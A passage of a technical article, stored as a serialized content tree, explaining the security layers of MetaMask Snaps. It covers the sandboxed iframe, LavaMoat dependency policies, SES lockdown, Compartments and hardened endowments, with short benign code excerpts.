",{"type":24,"tag":301,"props":43384,"children":43385},{"style":369},[43386],{"type":30,"value":43206},{"type":24,"tag":301,"props":43388,"children":43389},{"style":359},[43390],{"type":30,"value":377},{"type":24,"tag":301,"props":43392,"children":43393},{"style":369},[43394],{"type":30,"value":43003},{"type":24,"tag":301,"props":43396,"children":43397},{"style":359},[43398],{"type":30,"value":25077},{"type":24,"tag":301,"props":43400,"children":43401},{"class":303,"line":635},[43402],{"type":24,"tag":301,"props":43403,"children":43404},{"style":359},[43405],{"type":30,"value":6918},{"type":24,"tag":32,"props":43407,"children":43408},{},[43409,43411,43417,43419,43426],{"type":30,"value":43410},"Here the iframe is created via ",{"type":24,"tag":145,"props":43412,"children":43414},{"className":43413},[],[43415],{"type":30,"value":43416},"createWindow",{"type":30,"value":43418},", which is defined in snaps-utils ",{"type":24,"tag":188,"props":43420,"children":43423},{"href":43421,"rel":43422},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-utils/src/iframe.ts#L17",[192],[43424],{"type":30,"value":43425},"package",{"type":30,"value":1679},{"type":24,"tag":291,"props":43428,"children":43430},{"className":42674,"code":43429,"language":42676,"meta":7,"style":7},"const iframe = document.createElement('iframe');\n iframe.setAttribute('id', id);\n iframe.setAttribute('data-testid', 'snaps-iframe');\n\n if (sandbox) {\n iframe.setAttribute('sandbox', 'allow-scripts');\n }\n iframe.setAttribute('src', uri);\n document.body.appendChild(iframe);\n",[43431],{"type":24,"tag":145,"props":43432,"children":43433},{"__ignoreMap":7},[43434,43477,43515,43552,43559,43579,43617,43624,43661],{"type":24,"tag":301,"props":43435,"children":43436},{"class":303,"line":304},[43437,43441,43446,43450,43455,43459,43464,43468,43473],{"type":24,"tag":301,"props":43438,"children":43439},{"style":348},[43440],{"type":30,"value":16460},{"type":24,"tag":301,"props":43442,"children":43443},{"style":369},[43444],{"type":30,"value":43445}," iframe",{"type":24,"tag":301,"props":43447,"children":43448},{"style":385},[43449],{"type":30,"value":2537},{"type":24,"tag":301,"props":43451,"children":43452},{"style":369},[43453],{"type":30,"value":43454}," document",{"type":24,"tag":301,"props":43456,"children":43457},{"style":359},[43458],{"type":30,"value":206},{"type":24,"tag":301,"props":43460,"children":43461},{"style":314},[43462],{"type":30,"value":43463},"createElement",{"type":24,"tag":301,"props":43465,"children":43466},{"style":359},[43467],{"type":30,"value":362},{"type":24,"tag":301,"props":43469,"children":43470},{"style":329},[43471],{"type":30,"value":43472},"'iframe'",{"type":24,"tag":301,"props":43474,"children":43475},{"style":359},[43476],{"type":30,"value":589},{"type":24,"tag":301,"props":43478,"children":43479},{"class":303,"line":320},[43480,43485,43489,43494,43498,43503,43507,43511],{"type":24,"tag":301,"props":43481,"children":43482},{"style":369},[43483],{"type":30,"value":43484}," iframe",{"type":24,"tag":301,"props":43486,"children":43487},{"style":359},[43488],{"type":30,"value":206},{"type":24,"tag":301,"props":43490,"children":43491},{"style":314},[43492],{"type":30,"value":43493},"setAttribute",{"type":24,"tag":301,"props":43495,"children":43496},{"style":359},[43497],{"type":30,"value":362},{"type":24,"tag":301,"props":43499,"children":43500},{"style":329},[43501],{"type":30,"value":43502},"'id'",{"type":24,"tag":301,"props":43504,"children":43505},{"style":359},[43506],{"type":30,"value":377},{"type":24,"tag":301,"props":43508,"children":43509},{"style":369},[43510],{"type":30,"value":10313},{"type":24,"tag":301,"props":43512,"children":43513},{"style":359},[43514],{"type":30,"value":589},{"type":24,"tag":301,"props":43516,"children":43517},{"class":303,"line":335},[43518,43522,43526,43530,43534,43539,43543,43548],{"type":24,"tag":301,"props":43519,"children":43520},{"style":369},[43521],{"type":30,"value":43484},{"type":24,"tag":301,"props":43523,"children":43524},{"style":359},[43525],{"type":30,"value":206},{"type":24,"tag":301,"props":43527,"children":43528},{"style":314},[43529],{"type":30,"value":43493},{"type":24,"tag":301,"props":43531,"children":43532},{"style":359},[43533],{"type":30,"value":362},{"type":24,"tag":301,"props":43535,"children":43536},{"style":329},[43537],{"type":30,"value":43538},"'data-testid'",{"type":24,"tag":301,"props":43540,"children":43541},{"style":359},[43542],{"type":30,"value":377},{"type":24,"tag":301,"props":43544,"children":43545},{"style":329},[43546],{"type":30,"value":43547},"'snaps-iframe'",{"type":24,"tag":301,"props":43549,"children":43550},{"style":359},[43551],{"type":30,"value":589},{"type":24,"tag":301,"props":43553,"children":43554},{"class":303,"line":344},[43555],{"type":24,"tag":301,"props":43556,"children":43557},{"emptyLinePlaceholder":16},[43558],{"type":30,"value":341},{"type":24,"tag":301,"props":43560,"children":43561},{"class":303,"line":401},[43562,43566,43570,43575],{"type":24,"tag":301,"props":43563,"children":43564},{"style":308},[43565],{"type":30,"value":453},{"type":24,"tag":301,"props":43567,"children":43568},{"style":359},[43569],{"type":30,"value":873},{"type":24,"tag":301,"props":43571,"children":43572},{"style":369},[43573],{"type":30,"value":43574},"sandbox",{"type":24,"tag":301,"props":43576,"children":43577},{"style":359},[43578],{"type":30,"value":398},{"type":24,"tag":301,"props":43580,"children":43581},{"class":303,"line":415},[43582,43587,43591,43595,43599,43604,43608,43613],{"type":24,"tag":301,"props":43583,"children":43584},{"style":369},[43585],{"type":30,"value":43586}," iframe",{"type":24,"tag":301,"props":43588,"children":43589},{"style":359},[43590],{"type":30,"value":206},{"type":24,"tag":301,"props":43592,"children":43593},{"style":314},[43594],{"type":30,"value":43493},{"type":24,"tag":301,"props":43596,"children":43597},{"style":359},[43598],{"type":30,"value":362},{"type":24,"tag":301,"props":43600,"children":43601},{"style":329},[43602],{"type":30,"value":43603},"'sandbox'",{"type":24,"tag":301,"props":43605,"children":43606},{"style":359},[43607],{"type":30,"value":377},{"type":24,"tag":301,"props":43609,"children":43610},{"style":329},[43611],{"type":30,"value":43612},"'allow-scripts'",{"type":24,"tag":301,"props":43614,"children":43615},{"style":359},[43616],{"type":30,"value":589},{"type":24,"tag":301,"props":43618,"children":43619},{"class":303,"line":439},[43620],{"type":24,"tag":301,"props":43621,"children":43622},{"style":359},[43623],{"type":30,"value":501},{"type":24,"tag":301,"props":43625,"children":43626},{"class":303,"line":447},[43627,43631,43635,43639,43643,43648,43652,43657],{"type":24,"tag":301,"props":43628,"children":43629},{"style":369},[43630],{"type":30,"value":43484},{"type":24,"tag":301,"props":43632,"children":43633},{"style":359},[43634],{"type":30,"value":206},{"type":24,"tag":301,"props":43636,"children":43637},{"style":314},[43638],{"type":30,"value":43493},{"type":24,"tag":301,"props":43640,"children":43641},{"style":359},[43642],{"type":30,"value":362},{"type":24,"tag":301,"props":43644,"children":43645},{"style":329},[43646],{"type":30,"value":43647},"'src'",{"type":24,"tag":301,"props":43649,"children":43650},{"style":359},[43651],{"type":30,"value":377},{"type":24,"tag":301,"props":43653,"children":43654},{"style":369},[43655],{"type":30,"value":43656},"uri",{"type":24,"tag":301,"props":43658,"children":43659},{"style":359},[43660],{"type":30,"value":589},{"type":24,"tag":301,"props":43662,"children":43663},{"class":303,"line":476},[43664,43668,43672,43676,43680,43685,43689,43694],{"type":24,"tag":301,"props":43665,"children":43666},{"style":369},[43667],{"type":30,"value":41422},{"type":24,"tag":301,"props":43669,"children":43670},{"style":359},[43671],{"type":30,"value":206},{"type":24,"tag":301,"props":43673,"children":43674},{"style":369},[43675],{"type":30,"value":39150},{"type":24,"tag":301,"props":43677,"children":43678},{"style":359},[43679],{"type":30,"value":206},{"type":24,"tag":301,"props":43681,"children":43682},{"style":314},[43683],{"type":30,"value":43684},"appendChild",{"type":24,"tag":301,"props":43686,"children":43687},{"style":359},[43688],{"type":30,"value":362},{"type":24,"tag":301,"props":43690,"children":43691},{"style":369},[43692],{"type":30,"value":43693},"iframe",{"type":24,"tag":301,"props":43695,"children":43696},{"style":359},[43697],{"type":30,"value":589},{"type":24,"tag":32,"props":43699,"children":43700},{},[43701],{"type":30,"value":43702},"This enables the iframe to be created with sandbox attributes, ensuring secure execution.",{"type":24,"tag":80,"props":43704,"children":43706},{"id":43705},"lavamoat-against-supply-chain-attacks-layer-2",[43707],{"type":30,"value":43708},"LavaMoat against Supply Chain Attacks - Layer 2",{"type":24,"tag":32,"props":43710,"children":43711},{},[43712],{"type":30,"value":43713},"Instances of software supply chain breaches occur when a malicious component infiltrates a developer's application. Subsequently, attackers exploit the component to extract critical information, such as private access keys. To safeguard against these issues, Metamask employs a tool called LavaMoat.",{"type":24,"tag":32,"props":43715,"children":43716},{},[43717,43719,43725],{"type":30,"value":43718},"Malicious dependencies might utilize built-in modules like ",{"type":24,"tag":145,"props":43720,"children":43722},{"className":43721},[],[43723],{"type":30,"value":43724},"fs",{"type":30,"value":43726},". Alternatively, they may inject malicious code into the npm package to target global objects, like the window and document. They might also include code that leverages XMLHttpRequest to make unauthorized requests to external servers, enabling the exfiltration of sensitive user information.",{"type":24,"tag":32,"props":43728,"children":43729},{},[43730],{"type":30,"value":43731},"In order to prevent this, Metamask Snaps use a Policy file provided by LavaMoat, that grants the platform API and the Globals access just to the essentials components. This limits the access to fields of powerful objects to corrupted dependencies.",{"type":24,"tag":32,"props":43733,"children":43734},{},[43735,43737,43744],{"type":30,"value":43736},"This is how a Policy file related to the iframes ",{"type":24,"tag":188,"props":43738,"children":43741},{"href":43739,"rel":43740},"https://github.com/MetaMask/snaps/blob/c5ddd897734f900f459c66a91f3334e76903825c/packages/snaps-execution-environments/lavamoat/browserify/iframe/policy.json#L49",[192],[43742],{"type":30,"value":43743},"looks",{"type":30,"value":1679},{"type":24,"tag":291,"props":43746,"children":43748},{"className":6681,"code":43747,"language":6680,"meta":7,"style":7},"\"@metamask/post-message-stream\": {\n \"globals\": {\n \"MessageEvent.prototype\": true,\n \"WorkerGlobalScope\": true,\n \"addEventListener\": true,\n \"browser\": true,\n \"chrome\": true,\n \"location.origin\": true,\n \"postMessage\": true,\n \"removeEventListener\": true\n },\n \"packages\": {\n \"@metamask/post-message-stream>@metamask/utils\": true,\n \"@metamask/post-message-stream>readable-stream\": true\n }\n }\n",[43749],{"type":24,"tag":145,"props":43750,"children":43751},{"__ignoreMap":7},[43752,43764,43776,43796,43816,43836,43856,43876,43896,43916,43933,43940,43952,43972,43988,43995],{"type":24,"tag":301,"props":43753,"children":43754},{"class":303,"line":304},[43755,43760],{"type":24,"tag":301,"props":43756,"children":43757},{"style":329},[43758],{"type":30,"value":43759},"\"@metamask/post-message-stream\"",{"type":24,"tag":301,"props":43761,"children":43762},{"style":359},[43763],{"type":30,"value":6726},{"type":24,"tag":301,"props":43765,"children":43766},{"class":303,"line":320},[43767,43772],{"type":24,"tag":301,"props":43768,"children":43769},{"style":369},[43770],{"type":30,"value":43771}," \"globals\"",{"type":24,"tag":301,"props":43773,"children":43774},{"style":359},[43775],{"type":30,"value":6726},{"type":24,"tag":301,"props":43777,"children":43778},{"class":303,"line":335},[43779,43784,43788,43792],{"type":24,"tag":301,"props":43780,"children":43781},{"style":369},[43782],{"type":30,"value":43783}," \"MessageEvent.prototype\"",{"type":24,"tag":301,"props":43785,"children":43786},{"style":359},[43787],{"type":30,"value":5615},{"type":24,"tag":301,"props":43789,"children":43790},{"style":348},[43791],{"type":30,"value":10819},{"type":24,"tag":301,"props":43793,"children":43794},{"style":359},[43795],{"type":30,"value":1729},{"type":24,"tag":301,"props":43797,"children":43798},{"class":303,"line":344},[43799,43804,43808,43812],{"type":24,"tag":301,"props":43800,"children":43801},{"style":369},[43802],{"type":30,"value":43803}," \"WorkerGlobalScope\"",{"type":24,"tag":301,"props":43805,"children":43806},{"style":359},[43807],{"type":30,"value":5615},{"type":24,"tag":301,"props":43809,"children":43810},{"style":348},[43811],{"type":30,"value":10819},{"type":24,"tag":301,"props":43813,"children":43814},{"style":359},[43815],{"type":30,"value":1729},{"type":24,"tag":301,"props":43817,"children":43818},{"class":303,"line":401},[43819,43824,43828,43832],{"type":24,"tag":301,"props":43820,"children":43821},{"style":369},[43822],{"type":30,"value":43823}," \"addEventListener\"",{"type":24,"tag":301,"props":43825,"children":43826},{"style":359},[43827],{"type":30,"value":5615},{"type":24,"tag":301,"props":43829,"children":43830},{"style":348},[43831],{"type":30,"value":10819},{"type":24,"tag":301,"props":43833,"children":43834},{"style":359},[43835],{"type":30,"value":1729},{"type":24,"tag":301,"props":43837,"children":43838},{"class":303,"line":415},[43839,43844,43848,43852],{"type":24,"tag":301,"props":43840,"children":43841},{"style":369},[43842],{"type":30,"value":43843}," \"browser\"",{"type":24,"tag":301,"props":43845,"children":43846},{"style":359},[43847],{"type":30,"value":5615},{"type":24,"tag":301,"props":43849,"children":43850},{"style":348},[43851],{"type":30,"value":10819},{"type":24,"tag":301,"props":43853,"children":43854},{"style":359},[43855],{"type":30,"value":1729},{"type":24,"tag":301,"props":43857,"children":43858},{"class":303,"line":439},[43859,43864,43868,43872],{"type":24,"tag":301,"props":43860,"children":43861},{"style":369},[43862],{"type":30,"value":43863}," \"chrome\"",{"type":24,"tag":301,"props":43865,"children":43866},{"style":359},[43867],{"type":30,"value":5615},{"type":24,"tag":301,"props":43869,"children":43870},{"style":348},[43871],{"type":30,"value":10819},{"type":24,"tag":301,"props":43873,"children":43874},{"style":359},[43875],{"type":30,"value":1729},{"type":24,"tag":301,"props":43877,"children":43878},{"class":303,"line":447},[43879,43884,43888,43892],{"type":24,"tag":301,"props":43880,"children":43881},{"style":369},[43882],{"type":30,"value":43883}," \"location.origin\"",{"type":24,"tag":301,"props":43885,"children":43886},{"style":359},[43887],{"type":30,"value":5615},{"type":24,"tag":301,"props":43889,"children":43890},{"style":348},[43891],{"type":30,"value":10819},{"type":24,"tag":301,"props":43893,"children":43894},{"style":359},[43895],{"type":30,"value":1729},{"type":24,"tag":301,"props":43897,"children":43898},{"class":303,"line":476},[43899,43904,43908,43912],{"type":24,"tag":301,"props":43900,"children":43901},{"style":369},[43902],{"type":30,"value":43903}," \"postMessage\"",{"type":24,"tag":301,"props":43905,"children":43906},{"style":359},[43907],{"type":30,"value":5615},{"type":24,"tag":301,"props":43909,"children":43910},{"style":348},[43911],{"type":30,"value":10819},{"type":24,"tag":301,"props":43913,"children":43914},{"style":359},[43915],{"type":30,"value":1729},{"type":24,"tag":301,"props":43917,"children":43918},{"class":303,"line":495},[43919,43924,43928],{"type":24,"tag":301,"props":43920,"children":43921},{"style":369},[43922],{"type":30,"value":43923}," \"removeEventListener\"",{"type":24,"tag":301,"props":43925,"children":43926},{"style":359},[43927],{"type":30,"value":5615},{"type":24,"tag":301,"props":43929,"children":43930},{"style":348},[43931],{"type":30,"value":43932},"true\n",{"type":24,"tag":301,"props":43934,"children":43935},{"class":303,"line":504},[43936],{"type":24,"tag":301,"props":43937,"children":43938},{"style":359},[43939],{"type":30,"value":6903},{"type":24,"tag":301,"props":43941,"children":43942},{"class":303,"line":512},[43943,43948],{"type":24,"tag":301,"props":43944,"children":43945},{"style":369},[43946],{"type":30,"value":43947}," \"packages\"",{"type":24,"tag":301,"props":43949,"children":43950},{"style":359},[43951],{"type":30,"value":6726},{"type":24,"tag":301,"props":43953,"children":43954},{"class":303,"line":592},[43955,43960,43964,43968],{"type":24,"tag":301,"props":43956,"children":43957},{"style":369},[43958],{"type":30,"value":43959}," \"@metamask/post-message-stream>@metamask/utils\"",{"type":24,"tag":301,"props":43961,"children":43962},{"style":359},[43963],{"type":30,"value":5615},{"type":24,"tag":301,"props":43965,"children":43966},{"style":348},[43967],{"type":30,"value":10819},{"type":24,"tag":301,"props":43969,"children":43970},{"style":359},[43971],{"type":30,"value":1729},{"type":24,"tag":301,"props":43973,"children":43974},{"class":303,"line":619},[43975,43980,43984],{"type":24,"tag":301,"props":43976,"children":43977},{"style":369},[43978],{"type":30,"value":43979}," \"@metamask/post-message-stream>readable-stream\"",{"type":24,"tag":301,"props":43981,"children":43982},{"style":359},[43983],{"type":30,"value":5615},{"type":24,"tag":301,"props":43985,"children":43986},{"style":348},[43987],{"type":30,"value":43932},{"type":24,"tag":301,"props":43989,"children":43990},{"class":303,"line":635},[43991],{"type":24,"tag":301,"props":43992,"children":43993},{"style":359},[43994],{"type":30,"value":19459},{"type":24,"tag":301,"props":43996,"children":43997},{"class":303,"line":643},[43998],{"type":24,"tag":301,"props":43999,"children":44000},{"style":359},[44001],{"type":30,"value":501},{"type":24,"tag":32,"props":44003,"children":44004},{},[44005,44007,44013,44015,44021,44023,44029,44031,44037,44038,44044],{"type":30,"value":44006},"One crucial aspect of the policy, apart from the ",{"type":24,"tag":145,"props":44008,"children":44010},{"className":44009},[],[44011],{"type":30,"value":44012},"globals",{"type":30,"value":44014}," section, is the ",{"type":24,"tag":145,"props":44016,"children":44018},{"className":44017},[],[44019],{"type":30,"value":44020},"packages",{"type":30,"value":44022}," segment. This section permits the ",{"type":24,"tag":145,"props":44024,"children":44026},{"className":44025},[],[44027],{"type":30,"value":44028},"@metamask/post-message-stream",{"type":30,"value":44030},"package to exclusively interact with the package ",{"type":24,"tag":145,"props":44032,"children":44034},{"className":44033},[],[44035],{"type":30,"value":44036},"@metamask/utils",{"type":30,"value":2378},{"type":24,"tag":145,"props":44039,"children":44041},{"className":44040},[],[44042],{"type":30,"value":44043},"readable-stream",{"type":30,"value":44045},". It ensures that interactions with potentially compromised packages are disallowed.",{"type":24,"tag":32,"props":44047,"children":44048},{},[44049,44051,44057],{"type":30,"value":44050},"LavaMoat additionally provides protection against prototype pollution attacks, since a malicious extension could use it to tamper with a legitimate function with arbitrary code. To safeguard against this, LavaMoat uses SES ",{"type":24,"tag":145,"props":44052,"children":44054},{"className":44053},[],[44055],{"type":30,"value":44056},"lockdown",{"type":30,"value":44058}," function to freeze all javascript builtins prototypes.",{"type":24,"tag":80,"props":44060,"children":44062},{"id":44061},"secure-ecmascript-ses-sandbox-layer-3",[44063],{"type":30,"value":44064},"Secure EcmaScript (SES) sandbox - Layer 3",{"type":24,"tag":32,"props":44066,"children":44067},{},[44068,44070,44077],{"type":30,"value":44069},"Within the iframe and after the lavamoat execution, the metamask sandbox uses the ",{"type":24,"tag":188,"props":44071,"children":44074},{"href":44072,"rel":44073},"https://github.com/endojs/endo/tree/master/packages/ses",[192],[44075],{"type":30,"value":44076},"Secure EcmaScript (SES)",{"type":30,"value":44078}," as a way to setup limits to the snap. Let's dig into how it works:",{"type":24,"tag":270,"props":44080,"children":44082},{"id":44081},"ses-fundamentals",[44083],{"type":30,"value":44084},"SES Fundamentals",{"type":24,"tag":44086,"props":44087,"children":44088},"h5",{"id":44056},[44089],{"type":30,"value":44090},"Lockdown",{"type":24,"tag":32,"props":44092,"children":44093},{},[44094,44096,44102],{"type":30,"value":44095},"As the first step of setting up the SES sandbox, Metamask executes the ",{"type":24,"tag":145,"props":44097,"children":44099},{"className":44098},[],[44100],{"type":30,"value":44101},"lockdown()",{"type":30,"value":44103}," function, which protects javascript objects against some attacks, mainly:",{"type":24,"tag":6246,"props":44105,"children":44106},{},[44107,44120],{"type":24,"tag":2659,"props":44108,"children":44109},{},[44110,44112,44118],{"type":30,"value":44111},"Prototype Pollution\nLockdown executes ",{"type":24,"tag":145,"props":44113,"children":44115},{"className":44114},[],[44116],{"type":30,"value":44117},"Object.freeze",{"type":30,"value":44119}," against all javascript builtins prototypes, preventing these attacks.",{"type":24,"tag":2659,"props":44121,"children":44122},{},[44123,44125,44131,44133,44139],{"type":30,"value":44124},"Information disclosure\nLockdown removes some sensitive information that can be disclosed by some javascript builtin objects, such as the ",{"type":24,"tag":145,"props":44126,"children":44128},{"className":44127},[],[44129],{"type":30,"value":44130},"trace",{"type":30,"value":44132}," attribute in an ",{"type":24,"tag":145,"props":44134,"children":44136},{"className":44135},[],[44137],{"type":30,"value":44138},"Error",{"type":30,"value":44140}," object, which contains the stack trace of the error.",{"type":24,"tag":44086,"props":44142,"children":44144},{"id":44143},"compartment",[44145],{"type":30,"value":44146},"Compartment",{"type":24,"tag":32,"props":44148,"children":44149},{},[44150,44152,44158,44160,44165],{"type":30,"value":44151},"Compartments serve as the fundamental security layer within the snap execution environment. Their primary function is to establish a tightly controlled sandboxed execution environment. This is accomplished by manipulating the ",{"type":24,"tag":145,"props":44153,"children":44155},{"className":44154},[],[44156],{"type":30,"value":44157},"globalThis",{"type":30,"value":44159}," object to exclusively accommodate secure functions. Consequently, any code executed within this controlled ",{"type":24,"tag":145,"props":44161,"children":44163},{"className":44162},[],[44164],{"type":30,"value":44157},{"type":30,"value":44166}," context is incapable of tampering with security.",{"type":24,"tag":291,"props":44168,"children":44170},{"className":3185,"code":44169,"language":3184,"meta":7,"style":7},"const c = new Compartment();\nc.globalThis === globalThis; // false\nc.globalThis.JSON === JSON; // true\n",[44171],{"type":24,"tag":145,"props":44172,"children":44173},{"__ignoreMap":7},[44174,44202,44235],{"type":24,"tag":301,"props":44175,"children":44176},{"class":303,"line":304},[44177,44181,44185,44189,44193,44198],{"type":24,"tag":301,"props":44178,"children":44179},{"style":348},[44180],{"type":30,"value":16460},{"type":24,"tag":301,"props":44182,"children":44183},{"style":369},[44184],{"type":30,"value":1494},{"type":24,"tag":301,"props":44186,"children":44187},{"style":385},[44188],{"type":30,"value":2537},{"type":24,"tag":301,"props":44190,"children":44191},{"style":348},[44192],{"type":30,"value":38685},{"type":24,"tag":301,"props":44194,"children":44195},{"style":314},[44196],{"type":30,"value":44197}," Compartment",{"type":24,"tag":301,"props":44199,"children":44200},{"style":359},[44201],{"type":30,"value":4859},{"type":24,"tag":301,"props":44203,"children":44204},{"class":303,"line":320},[44205,44209,44213,44217,44221,44226,44230],{"type":24,"tag":301,"props":44206,"children":44207},{"style":369},[44208],{"type":30,"value":294},{"type":24,"tag":301,"props":44210,"children":44211},{"style":359},[44212],{"type":30,"value":206},{"type":24,"tag":301,"props":44214,"children":44215},{"style":369},[44216],{"type":30,"value":44157},{"type":24,"tag":301,"props":44218,"children":44219},{"style":385},[44220],{"type":30,"value":38177},{"type":24,"tag":301,"props":44222,"children":44223},{"style":369},[44224],{"type":30,"value":44225}," globalThis",{"type":24,"tag":301,"props":44227,"children":44228},{"style":359},[44229],{"type":30,"value":3940},{"type":24,"tag":301,"props":44231,"children":44232},{"style":1062},[44233],{"type":30,"value":44234},"// false\n",{"type":24,"tag":301,"props":44236,"children":44237},{"class":303,"line":335},[44238,44242,44246,44250,44254,44259,44263,44268,44272],{"type":24,"tag":301,"props":44239,"children":44240},{"style":369},[44241],{"type":30,"value":294},{"type":24,"tag":301,"props":44243,"children":44244},{"style":359},[44245],{"type":30,"value":206},{"type":24,"tag":301,"props":44247,"children":44248},{"style":369},[44249],{"type":30,"value":44157},{"type":24,"tag":301,"props":44251,"children":44252},{"style":359},[44253],{"type":30,"value":206},{"type":24,"tag":301,"props":44255,"children":44256},{"style":369},[44257],{"type":30,"value":44258},"JSON",{"type":24,"tag":301,"props":44260,"children":44261},{"style":385},[44262],{"type":30,"value":38177},{"type":24,"tag":301,"props":44264,"children":44265},{"style":369},[44266],{"type":30,"value":44267}," JSON",{"type":24,"tag":301,"props":44269,"children":44270},{"style":359},[44271],{"type":30,"value":3940},{"type":24,"tag":301,"props":44273,"children":44274},{"style":1062},[44275],{"type":30,"value":44276},"// true\n",{"type":24,"tag":32,"props":44278,"children":44279},{},[44280,44282,44288,44290,44296,44298,44303],{"type":30,"value":44281},"Compartment also changes the behaviour of evaluators functions such as ",{"type":24,"tag":145,"props":44283,"children":44285},{"className":44284},[],[44286],{"type":30,"value":44287},"eval",{"type":30,"value":44289}," and the ",{"type":24,"tag":145,"props":44291,"children":44293},{"className":44292},[],[44294],{"type":30,"value":44295},"Function",{"type":30,"value":44297}," constructor, so that the evaluated code is also executed within the sandboxed ",{"type":24,"tag":145,"props":44299,"children":44301},{"className":44300},[],[44302],{"type":30,"value":44157},{"type":30,"value":206},{"type":24,"tag":44086,"props":44305,"children":44307},{"id":44306},"endowments",[44308],{"type":30,"value":44309},"Endowments",{"type":24,"tag":32,"props":44311,"children":44312},{},[44313,44315,44319,44321,44326],{"type":30,"value":44314},"While creating a Compartment, it is possible to specify ",{"type":24,"tag":5422,"props":44316,"children":44317},{},[44318],{"type":30,"value":44306},{"type":30,"value":44320},". These endowments constitute objects that become accessible within the Compartment's ",{"type":24,"tag":145,"props":44322,"children":44324},{"className":44323},[],[44325],{"type":30,"value":44157},{"type":30,"value":44327},". However, endowments need to be carefully chosen and sanitized since they will be exposed to the untrusted environment.",{"type":24,"tag":32,"props":44329,"children":44330},{},[44331,44333,44339],{"type":30,"value":44332},"In addition, SES provides the ",{"type":24,"tag":145,"props":44334,"children":44336},{"className":44335},[],[44337],{"type":30,"value":44338},"harden()",{"type":30,"value":44340}," function, which is mainly used to prevent the endowments to be modified by a malicious code executed in a Compartment.",{"type":24,"tag":270,"props":44342,"children":44344},{"id":44343},"setting-up-snaps-execution-env",[44345],{"type":30,"value":44346},"Setting up Snaps Execution Env",{"type":24,"tag":32,"props":44348,"children":44349},{},[44350],{"type":30,"value":44351},"When starting a snap, the setup follows these steps:",{"type":24,"tag":6246,"props":44353,"children":44354},{},[44355],{"type":24,"tag":2659,"props":44356,"children":44357},{},[44358],{"type":24,"tag":60,"props":44359,"children":44360},{},[44361,44363],{"type":30,"value":44362},"Create endowments based on snap ",{"type":24,"tag":188,"props":44364,"children":44367},{"href":44365,"rel":44366},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L327",[192],[44368],{"type":30,"value":44369},"permissions",{"type":24,"tag":291,"props":44371,"children":44373},{"className":3185,"code":44372,"language":3184,"meta":7,"style":7},"const { endowments, teardown: endowmentTeardown } = createEndowments(\n snap,\n ethereum,\n snapId,\n _endowments,\n);\n",[44374],{"type":24,"tag":145,"props":44375,"children":44376},{"__ignoreMap":7},[44377,44427,44439,44450,44462,44474],{"type":24,"tag":301,"props":44378,"children":44379},{"class":303,"line":304},[44380,44384,44388,44392,44396,44401,44405,44410,44414,44418,44423],{"type":24,"tag":301,"props":44381,"children":44382},{"style":348},[44383],{"type":30,"value":16460},{"type":24,"tag":301,"props":44385,"children":44386},{"style":359},[44387],{"type":30,"value":16392},{"type":24,"tag":301,"props":44389,"children":44390},{"style":369},[44391],{"type":30,"value":44306},{"type":24,"tag":301,"props":44393,"children":44394},{"style":359},[44395],{"type":30,"value":377},{"type":24,"tag":301,"props":44397,"children":44398},{"style":369},[44399],{"type":30,"value":44400},"teardown",{"type":24,"tag":301,"props":44402,"children":44403},{"style":359},[44404],{"type":30,"value":5615},{"type":24,"tag":301,"props":44406,"children":44407},{"style":369},[44408],{"type":30,"value":44409},"endowmentTeardown",{"type":24,"tag":301,"props":44411,"children":44412},{"style":359},[44413],{"type":30,"value":42945},{"type":24,"tag":301,"props":44415,"children":44416},{"style":385},[44417],{"type":30,"value":523},{"type":24,"tag":301,"props":44419,"children":44420},{"style":314},[44421],{"type":30,"value":44422}," createEndowments",{"type":24,"tag":301,"props":44424,"children":44425},{"style":359},[44426],{"type":30,"value":1707},{"type":24,"tag":301,"props":44428,"children":44429},{"class":303,"line":320},[44430,44435],{"type":24,"tag":301,"props":44431,"children":44432},{"style":369},[44433],{"type":30,"value":44434}," snap",{"type":24,"tag":301,"props":44436,"children":44437},{"style":359},[44438],{"type":30,"value":1729},{"type":24,"tag":301,"props":44440,"children":44441},{"class":303,"line":335},[44442,44446],{"type":24,"tag":301,"props":44443,"children":44444},{"style":369},[44445],{"type":30,"value":38238},{"type":24,"tag":301,"props":44447,"children":44448},{"style":359},[44449],{"type":30,"value":1729},{"type":24,"tag":301,"props":44451,"children":44452},{"class":303,"line":344},[44453,44458],{"type":24,"tag":301,"props":44454,"children":44455},{"style":369},[44456],{"type":30,"value":44457}," snapId",{"type":24,"tag":301,"props":44459,"children":44460},{"style":359},[44461],{"type":30,"value":1729},{"type":24,"tag":301,"props":44463,"children":44464},{"class":303,"line":401},[44465,44470],{"type":24,"tag":301,"props":44466,"children":44467},{"style":369},[44468],{"type":30,"value":44469}," _endowments",{"type":24,"tag":301,"props":44471,"children":44472},{"style":359},[44473],{"type":30,"value":1729},{"type":24,"tag":301,"props":44475,"children":44476},{"class":303,"line":415},[44477],{"type":24,"tag":301,"props":44478,"children":44479},{"style":359},[44480],{"type":30,"value":589},{"type":24,"tag":32,"props":44482,"children":44483},{},[44484],{"type":30,"value":44485},"In the snap development, the required permissions need to be specified in a snap manifest file. Some of these permissions expose extra functions as endowments in the Compartment.",{"type":24,"tag":32,"props":44487,"children":44488},{},[44489,44491,44497,44499,44505],{"type":30,"value":44490},"One clear example is the ",{"type":24,"tag":145,"props":44492,"children":44494},{"className":44493},[],[44495],{"type":30,"value":44496},"endowment:network-access",{"type":30,"value":44498}," permission, that adds the ",{"type":24,"tag":145,"props":44500,"children":44502},{"className":44501},[],[44503],{"type":30,"value":44504},"fetch()",{"type":30,"value":44506}," function to the endowments.",{"type":24,"tag":32,"props":44508,"children":44509},{},[44510,44512,44518],{"type":30,"value":44511},"All endowments are protected with the ",{"type":24,"tag":145,"props":44513,"children":44515},{"className":44514},[],[44516],{"type":30,"value":44517},"harden",{"type":30,"value":44519}," function to prevent possible exploits derived from the endowment modification, with two exceptions.",{"type":24,"tag":6246,"props":44521,"children":44522},{"start":320},[44523],{"type":24,"tag":2659,"props":44524,"children":44525},{},[44526],{"type":24,"tag":60,"props":44527,"children":44528},{},[44529,44531],{"type":30,"value":44530},"Create the snap ",{"type":24,"tag":188,"props":44532,"children":44535},{"href":44533,"rel":44534},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-execution-environments/src/common/BaseSnapExecutor.ts#L345",[192],[44536],{"type":30,"value":44143},{"type":24,"tag":291,"props":44538,"children":44540},{"className":3185,"code":44539,"language":3184,"meta":7,"style":7},"const compartment = new 